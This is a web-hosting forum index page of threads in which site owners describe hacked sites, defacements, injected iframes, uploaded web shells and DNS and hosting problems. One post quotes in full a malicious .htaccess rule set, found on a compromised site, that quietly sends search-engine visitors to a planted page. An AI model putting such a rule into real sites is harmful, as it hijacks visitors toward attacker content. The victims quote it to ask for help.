Website Hacked, IP And Domain
May 11, 2007
This is the second time this week that my website was hacked. On the first hack attempt they somehow got into my cpanel and corrupted my license file which I had my host fix. Other than that the only damage done was an html file that replaced my main page. Then today, I find that my website has been further compromised, but by a completely different group. The first hacker was g3n3t1x and this second hack was done by www.turkishdefacerteam.com
Now, the problem is my sites dedicated IP is 72.36.192.150, and my domain name is gamingguilds.net, but if you resolve the domain name, it resolves to 74.53.52.66. I have checked my nameservers and everything is set properly. But the thing I don't get is that when you type in my domain name in a web browser, you see my website. How can it be resolving to the wrong IP and STILL show my website. Also note that when you type in my dedicated IP it would still show my website (before this second attack).
Now after the second attack, my dedicated IP no longer works, I cant get into cpanel using the IP, I cant get into my FTP account, and I get view my website. Yet if you use the domain name to log into cpanel or view the website it works. The strange part here is that I can't get into the FTP using the domain name.
SO, if you go to [url]you see a blank cpanel site, if you go to [url] you get a 404 error, and if you go to www.gamingguilds.net you get my website.
View 14 Replies
ADVERTISEMENT
Jul 27, 2007
So I'm interviewing with a company and when I typed in the URL to their website, I was met with a nasty surprise: a "hacked by so and so" message! However, after looking closer, I see that I had accidentally appended a period (".") to the end of the domain name, for example: http://www.example.com./
When I removed the period, the site appeared as normal. I don't know anything about the server other than it's IIS. Is there anything I can suggest to them when I go in to interview? I'd like to point this out to them; it may even help my chances at landing the job! (It's not related to networking, though.)
View 0 Replies
View Related
Apr 30, 2009
Just this week, I believe one of my site has been hacked...or potentially my whole server! When accessing the website (a vBulletin forum), instead of going to the main page, we get a screen that looks like Window's "My Computer" and there is a scan running. Firefox has blocked the site for suspicion.
I am stumped. Where to begin? I have full SSH access to my server (after rebooting it). Thank you in advance.
Server: CentOS Linux 4.3
View 10 Replies
View Related
Aug 14, 2008
my site is hacked regularly
today when i checked htaccess file i found
Code:
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=
RewriteCond %{HTTP_REFERER} =[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/editor/filemanager/browser/default/images/ucohex/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
in it what does this code does.
View 24 Replies
View Related
Apr 24, 2007
I have been getting a lot of abusive email lately, just deleted them and thought nothing off it. Just about to go to bed and I see my website has been hacked.
www.pic-spot.com
They also said they were after www.anotherlaugh.com and www.shinyproxy.com
View 5 Replies
View Related
Jun 27, 2009
few sites are continously been hacked, these sites i m working on, whenever i connect the sites through FTP client(i m using Flash FXP) and upload the files the very next day the index file have the Iframe code written after the body tag by someone else of some malware site.
i have tried everything, changing the password on daily basis,even reinstall my system completey(thinking if there any backdoor trojan) firewall and antivirus,
View 13 Replies
View Related
Jul 18, 2009
We have a simple flash site. Not CMS or anything of that sort.
Recently out site was hacked. Nothing malicious as the only code that seems to have changed was out index file in which they injected a malware script ....
View 13 Replies
View Related
Aug 7, 2007
One of my clients has joomla site installed on his hosting.
But recently his website always get hacked. Hacker put one index.html file in the public_html folder. luckily they not deleting file and database..
This is happen twice in one week, even he change the cpanel password to a more complex one...
anyway to prevent this? any way to harden the security?
View 16 Replies
View Related
Jun 14, 2009
I have a small but somewhat popular space-history website. Very simple HTML that I typed into wordpad, but it has long pages full of photos. Since 2003, I've been using media3.net with their business-class Windows service.
A few weeks ago, mypages were hacked, and a one line script inserted that called an Adobe Flash file. Apparently this was a server-wise attack, not just my web pages. Media3.net cleaned this up, but now it has happened again.
This is bad, because Google blacklists my site, and folks on Wikipedia get upset because there are a lot of links to my site.
How are they breaking in to media3.net? I think I must change hosts, but I don't want to put my image-intensive site on overbooked hardware with limited bandwidth.
View 14 Replies
View Related
Feb 19, 2007
my server was hacked by Cold he/she inserted a couple of scripts that enabled remote access into a 777 permission folder.
i found the following script names:
back.pl
cpanel.php
cgitelnet.pl
cpanel.pl
gcc-cold <- shell script
i have deleted all the above files, and changed the folder chmod to 755
but the weird thing is, through shell, when i try to locate the file gcc-cold i get this:
Quote:
root@ [/tmp]# locate gcc-cold
/home/ns5f6/public_html/uploads/gcc-cold
root@ [/tmp]# rm /home/ns5f6/public_html/uploads/gcc-cold
rm: cannot lstat `/home/ns5f6/public_html/uploads/gcc-cold': No such file or directory
isn't locate NOT supposed to find that file after its been deleted? and if it was not deleted some how, isn't it supposed to delete it? am i missing something here??????
from a bit of researching the files, i found that it was a telnet script, BUT i have telnet disabled, and there's no process running along side GREP TELNET
how can i find malicious software or shell scripts that allow such hacking activities on the server?
View 6 Replies
View Related
Nov 9, 2007
I just when found this domain on google when I was make some search of content of my site
I found domain as a parked domain and work for my site!
so I go to cpanel and parked domain but not found any thing
so what this mean how someone have parked domain for my site and when i go to cpanel noting foudn also when I go to whm and accoubt listed I don’t find that domain?
View 4 Replies
View Related
Jan 28, 2008
A while back you could see the following information regarding facebook.com:
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Server Name: FACEBOOK.COM.ZZZZZ.GET.LAID.AT.WWW.SWINGINGCOMMUNITY.COM
IP Address: 69.41.185.229
Registrar: INNERWISE, INC. D/B/A ITSYOURDOMAIN.COM
Whois Server: whois.itsyourdomain.com
Referral URL: http://www.itsyourdomain.com
Server Name: FACEBOOK.COM.MORE.INFO.AT.WWW.BEYONDWHOIS.COM
IP Address: 203.36.226.2
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net
Domain Name: FACEBOOK.COM
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net
Name Server: DNS04.SF2P.TFBNW.NET
Name Server: DNS05.SF2P.TFBNW.NET
Name Server: DNS1.SCTM.TFBNW.NET
Name Server: DNS2.SCTM.TFBNW.NET
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 02-aug-2007
Creation Date: 2 Expiration Date: 30-mar-2010
>>> Last update of whois database: Mon, 28 Jan 2008 23:23:21 UTC <<<
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict oWhois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. .....
View 9 Replies
View Related
Aug 27, 2008
I've been handling the design and updates for a local private school for a few years now. They use HostOnce for hosting. Over 2 weeks ago I noticed that when I try to bring the site up in a browser I get a login prompt - [url]. I've submitted several help desk tickets to HostOnce with no response. Since school is starting, I recommended the school change hosting providers. So they bought hosting with GoDaddy who I also use. But now I need to transfer the domain name and I can't get a response from HostOnce. I send an email requesting that they initiate the domain transfer to GoDaddy every day with no response.
Besides a few email addresses and the help desk, there doesn't seem to be any way I can get in touch with anyone at HostOnce. What options do I have left? The school is currently stuck with a site that can't be accessed. The company seems to be in Australia but I've read the phone number listed for them does not work. I'm looking for a US phone number or something.
View 21 Replies
View Related
Mar 30, 2009
Basically as the title says I have a domain thedrunkengamer.net that is my main domain and website, I just got a dedicated server and in the startup steps in WHM im at the Nameserver setup screen.
If i go to GoDaddy and register ns1.thedrunkengamer.net and ns2.thedrunkengamer.net as nameservers can I still use www.thedrunkengamer.net as my website?
If so by doing this will it impact the performance of my website at all? Should I register a seperate domain to use for nameservers?
View 8 Replies
View Related
Jul 27, 2008
I've purchased a forum, using a sub-domain name like bbs.mywebsite.com.
All the files will be moved to my new dedicated server.
I'd like to use a new domain name for it, like newname. com
but still to not lose current memebers, still we want to keep bbs.mywebsite.com working as before.
I have 5 IP availble and want to allocate one of them to the new domain name newname .com
================================================== ====
Now, question, what should I do, can some one give me instruction step by step please, to make 2 domains both bbs.mywebsite.com and newname. com working properly. don't want to use redirect.
Now what I can think of is, add newname. com to my account, and change DNS to point to my nameserver, then copy the whole forum under new website. I dont know if this way is correct. Then I don't know how to link the original forum address to the new space.
View 7 Replies
View Related
Aug 22, 2008
I came across a problematic situation today. Our client pmb.com.my has complained that their domain, when accessed from search engines will go to another site, not theirs. So, perhaps you guys can try this out.
1. Type the URL on the browser directly: [url]
You'll get the real site.
2. Try searching for "pmb malaysia" on Google:
[url]
3. You should see a normal listing for the site as the 1st result. Try clicking that link.
4. In our checks, it will go to a landing page (black bankground), and will redirect to an adult site.
5. You get this landing page too when you click the link to the site in step 1.
Appreciate if more people can try this out and post your findings here. I've contacted the RZ (site hosted there), and they said it is an issue with Google's cache. Not sure I buy that.
View 6 Replies
View Related
Oct 6, 2007
I've recently opened an account at a shared webhosting, cPanel managed. I've assigned it the main domain name I plan to use, but currently that domain points to another webhosting.
Before I proceed with the change of nameservers and make the definitive switch from the old to the new host, is there any way I can privately preview my site (100% HTML) from the new host? I'd like to ensure it's working OK before making the jump.
I've tried to add an entry to my local HOSTS file assigning my domain to the new host IP, but I only get a default page from the new server.
View 8 Replies
View Related
Dec 16, 2008
DNS config for Domain, Website
View 2 Replies
View Related
Jun 2, 2007
I would like to create an SSL website for parts of my domain. I have a few VPS's one running cPanel, the others running just Webmin.
Now I have managed to install SSL as I can login to WHM/cPanel using the secure port fine. Also I have installed SSL on the Webmin VPS's as I followed www.webmin.com/ssl.html which tells you how.
However I would like to get sections of my website secure i.e secure.mydomain.com would be HTTPS, and the rest of the site just normal HTTP.
View 0 Replies
View Related
Nov 5, 2012
Differences between Websites & Domains and Webspaces
I'm a beginner in Plesk Panel and I've a "concept" question. So, which are the differences between Websites & Domains and Webspaces? There's some documentation about the definition of this three objects?
View 4 Replies
View Related
Jun 23, 2015
I have a Plesk 12 server running under Debian 7. I have a website with only mail so I disable web hosting. The problem is that the client needs to use webmail but webmail does not work (maybe because web hosting is disabled)...
View 1 Replies
View Related
May 18, 2014
When I use website copy function the website files are copied to another domain but the database remains on old site. I use this function to move the website from devel state to the production state. All sites work fine but when i schedule the backups all databases are saved on old domain. How to move the database on production domain?
View 1 Replies
View Related
Jul 3, 2014
OSMicrosoft Windows Server 2008 R2 Service Pack 1
Panel version11.5.30 Update #47
We have a few hosting plans setup with different "allowances" for each.The website permissions allow basic html and PHP.In Windows Advanced: The website settings allow for html, php, asp and asp.net
When we change a Basic Hosting plan to Windows Advanced using "Change Plan", it will reassign the subscription/domain to use the new plan, but it will not add-on the extra features in Hosting Settings.
View 1 Replies
View Related
May 3, 2008
If I type google.com in my address bar, it forwards me to www.google.com. This is not happening for my website right now. I think its a good idea to do this, since then search engines will have only 1 main URL for the website to index.
My question is:
How do I implement this? I think this may involve mucking with CNAME settings...
View 2 Replies
View Related
May 15, 2009
I want my users to be redirected directly to my forum
so when they type in www.mywebsite.com it will redirect instantly to www.mywebsite.com/forums
I know this can be done on Cpanel... any other ways?
View 7 Replies
View Related
Apr 3, 2008
I am renting a 384mb Plesk VPS, have 1 client website on it, and it was hacked. Someone set up a new user with root access and was attacking other networks including dictionary attacks. My host has cleaned up the mess. I suspect access was gained thru a weak password choice or thru a Wordpress hack.
The client website ran a php/mysql survey script sometimes with 20-25 simultaneous users, and about 5-10% were unable to complete the survey due to screen freeze up or time outs. I'm trying to get to the bottom of these errors and know that some of the problems were client side but could the attacks also have affected connectivity & website performance?
View 2 Replies
View Related
Aug 5, 2009
2 days ago i noticed my cpanel hardisk usage was a lot more then it should be, after looking around i found out my inbox was 400mb (82143)emails!! i don't use any of the cpanel email because i have them set to forwarding. all the emails are spam and i discovered a few emails using my domain (that i did not create) that are valid and when i email them it reaches this cpanel inbox
So how bad is it? have i been completely comprised or is someone managed to get some type of spaming access only?
View 5 Replies
View Related
Feb 5, 2008
I have a server with about 100 domains on it in Plesk. I have about 10 or so clients that pay me a pittance to host their site and the rest are various domains that have been parked.
About a week ago we received a "too many connections" error when accessing Plesk. This is our server and it sits at The Planet (formerly EV1). I cranked up the mx connections to 1,100 or so following some web tutorial but I'm really a complete idiot when it comes to this server stuff. (I'm more of a php / html kind of guy).
I check out logs and it appears that someone has been trying to access a bunch of celebrity images that shouldn't exist on our server. It's clearly spam of some kind. I can't seem to actually find these images on my server anywhere, but I've got a feeling that foul play has been involved.
View 7 Replies
View Related
Feb 4, 2007
Well, this is rather weird. I cant tell if this is a server error, or a hack.
Basically the contents of the thumbnail directories for videos, games and pictures were deleted, at 3pm today (according to the ftp time stamp). All those folders were chmodded 777, to allow PHP to upload the images into them.
View 14 Replies
View Related
